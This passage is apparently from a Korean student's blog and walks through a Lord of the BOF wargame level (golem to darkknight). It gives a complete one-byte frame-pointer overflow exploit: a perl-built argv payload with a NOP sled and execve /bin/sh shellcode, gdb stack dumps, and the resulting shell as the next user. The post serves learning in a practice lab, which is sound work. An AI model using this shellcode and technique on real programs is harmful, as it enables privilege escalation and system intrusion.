0xbffffafe: 0x00024003 0xfb440000 0xfb50bfff 0x3868bfff

0xbffffb0e: 0x00024001 0x83900000 0x00000804 0x83b10000

0xbffffb1e: 0x846c0804 0x00020804 0xfb440000 0x82e4bfff

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

Illegal instruction (core dumped)

[golem@localhost golem]$ gdb -q a.out core

warning: core file may not match specified executable file.

Core was generated by `./porkknight úú ¿j

XRh//shh/binRSÍ̀À'.

Program terminated with signal 4, Illegal instruction.

#0 0xbffffac4 in ?? ()

(gdb) z

[1]+ Stopped gdb -q a.out core

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight úú ¿j

XRh//shh/binRSÍ̀À'.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffac4 in ?? ()

(gdb) x/40wx $esp

0xbffffac8: 0x90909090 0x90909090 0x90909090 0x580b6a90

0xbffffad8: 0x2f685299 0x6868732f 0x6e69622f 0x5352e389

0xbffffae8: 0x80cde189 0xbffffac0 0x0804849e 0xbffffc4d

0xbffffaf8: 0xbffffb18 0x400309cb 0x00000002 0xbffffb44

0xbffffb08: 0xbffffb50 0x40013868 0x00000002 0x08048390

0xbffffb18: 0x00000000 0x080483b1 0x0804846c 0x00000002

0xbffffb28: 0xbffffb44 0x080482e4 0x080484dc 0x4000ae60

0xbffffb38: 0xbffffb3c 0x40013e90 0x00000002 0xbffffc40

0xbffffb48: 0xbffffc4d 0x00000000 0xbffffc78 0xbffffc88

0xbffffb58: 0xbffffca0 0xbffffcbf 0xbffffce1 0xbffffcec

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

bash$ gjf

sh: gjf: command not found

bash$ exit

exit

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @

bash$ my-pass

euid = 512

이번에 하면서 노트테이킹한거:

argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

has to equal 41bytes

23byte(쉘코드) 4byte(argv[1] 주소) = 27byte

13byte(nop)

아무것도 안넣어도 segfault가 나서 왜인지 trace를 해보니 strncpy에서 그냥 쭉 계속 해서 나머지 쓰레기값을 넣고있어서 그런거였다.. 멍청멍청 똥멍청 strncpy

strace ./porkknight `perl -e 'print "AAAA"'` -i

노트테이킹한 종잌ㅋㅋㅋ 낙서가 많아보이는건 착각이구여 엄마가 후에 뭐가 이렇게 더럽냐며 버리심ㅋㅋㅋㅋㅋ

LeaveRet에서 후광이 나는군여 보이나여

기분좋네옇

이제 에세이를 써야되는데 2장더써야댐 망함 2시임 프린트도해야댐 망함

이 문제 처음에 막 fpo문서를 봐도 이해가 안가서 풀이를 봤는데도 이해 안가서 그냥 fpo문서 엄청 열심히 읽으니까 막 스택도 그려지고 ebp도 따라갈 수 있게되고 esp가 뭔짓을 하는지도 좀 그려지고 우왕아ㅓㅁㄹㄴㅇㄹ밍ㄹ 스택 늘어나느것도 보이고 leaveret이 뭐를 하는지도 그려지고 와 진짜 이번껀 좀 대박이었어요 그래서 결국 마지막엔 풀이 기억도 안나고 걍 제 힘으로 풀게됬네여 아 완전기분좋다

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

bugbear->giant(1) (0)	2014.04.16
darkknight->bugbear (2)	2014.04.07
skeleton->golem (5)	2014.03.17
vampire->skeleton (2)	2014.02.25
troll->vampire (0)	2013.12.22

CodeGateJr_.pdf

음..

저를 본선으로 이끌어주었던.. 문제임다.

이끌어주긴 했는데..

ㅠ....

내년엔 기술적인 문제를 풀고싶네요ㅋㅋ

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
MISCCCCCCCCCC! (0)	2014.03.11

EverTokki

STUDY

narnia 0

'STUDY > overthewire' 카테고리의 다른 글

assassin->zombie_assassin

'STUDY > Lord of the BOF' 카테고리의 다른 글

giant->assassin

'STUDY > Lord of the BOF' 카테고리의 다른 글

bugbear->giant(1)

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkknight->bugbear

'STUDY > Lord of the BOF' 카테고리의 다른 글

Frame Pointer Overwrite/One Byte Overflow

'STUDY > Documentation' 카테고리의 다른 글

golem->darkknight

'STUDY > Lord of the BOF' 카테고리의 다른 글

[CodeGate Junior Quals] RunCommand 250

'STUDY > Documentation' 카테고리의 다른 글

+ Recent posts

티스토리툴바